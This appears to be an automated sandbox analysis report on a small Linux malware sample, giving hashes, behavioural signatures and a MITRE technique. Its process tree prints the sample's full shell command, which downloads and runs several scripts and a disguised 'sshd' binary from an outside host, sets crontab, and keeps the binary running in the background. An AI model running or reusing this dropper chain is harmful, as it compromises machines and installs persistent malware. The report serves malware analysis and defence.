Analysis

  • max time kernel
    24131s
  • max time network
    152s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-en-20211208, kernel:4.15.0-161-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    13-09-2022 23:53

General

  • Target

    e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d

  • Size

    1KB

  • MD5

    932df67ea6b8900a30249e311195a58f

  • SHA1

    d6b7c2388a75c2c3b71d5ad7130f1d3dfeb7fd83

  • SHA256

    e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d

  • SHA512

    f6801c3cbc1d28e8f4a5373340081528dc1ece23e59585cc45831177710ac785557ebf364bd8a867f0c687ca518f41913427b27ddd2f2ff64e64ae7ba760fc0c

Score
8/10

Malware Config

Signatures

  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

Processes

  • /tmp/e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d
    /tmp/e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d
    1⤵
      PID:576
    • /bin/sh
      /bin/sh -c "wget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/; chmod 777 /var/tmp/unix.sh; curl http://dash.cloudflare.ovh/mvt/unix.sh -s -o /var/tmp/unix.sh; chmod 777 /var/tmp/unix.sh; cd /var/tmp; ./unix.sh; cd /var/tmp; rm unix.sh; wget -nc http://dash.cloudflare.ovh/mvt/sshd -q -P /var/tmp/; chmod 777 /var/tmp/sshd; curl http://dash.cloudflare.ovh/mvt/sshd -s -o /var/tmp/sshd; chmod 777 /var/tmp/sshd; wget -nc http://dash.cloudflare.ovh/mvt/config.json -q -P /var/tmp/; curl http://dash.cloudflare.ovh/mvt/config.json -s -o /var/tmp/config.json; crontab -l 2>/dev/null | grep -qxF '' || (crontab -l 2>/dev/null ; echo '') | crontab -; wget -nc http://dash.cloudflare.ovh/mvt/truct.sh -q -P /var/tmp/; chmod 777 /var/tmp/truct.sh; curl http://dash.cloudflare.ovh/mvt/truct.sh -s -o /var/tmp/truct.sh; chmod 777 /var/tmp/truct.sh; cd /var/tmp; ./truct.sh 2>/dev/null; cd /var/tmp; rm truct.sh; wget -nc http://dash.cloudflare.ovh/mvt/brict.sh -q -P /var/tmp/; chmod 777 /var/tmp/brict.sh; curl http://dash.cloudflare.ovh/mvt/brict.sh -s -o /var/tmp/brict.sh; chmod 777 /var/tmp/brict.sh; cd /var/tmp; ./brict.sh 2>/dev/null; cd /var/tmp; rm brict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'; wget -nc http://dash.cloudflare.ovh/mvt/retrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/retrict.sh; curl http://dash.cloudflare.ovh/mvt/retrict.sh -s -o /var/tmp/retrict.sh; chmod 777 /var/tmp/retrict.sh; cd /var/tmp; ./retrict.sh 2>/dev/null; cd /var/tmp; rm retrict.sh; wget -nc http://dash.cloudflare.ovh/mvt/politrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/politrict.sh; curl http://dash.cloudflare.ovh/mvt/politrict.sh -s -o /var/tmp/politrict.sh; chmod 777 /var/tmp/politrict.sh; cd /var/tmp; ./politrict.sh 2>/dev/null; cd /var/tmp; rm politrict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'"
      1⤵
        PID:576
        • /usr/bin/wget
          wget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/
          2⤵
          • Modifies hosts file
          • Writes DNS configuration
          PID:577

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Command and Control
    Dynamic Resolution (T1568): 1
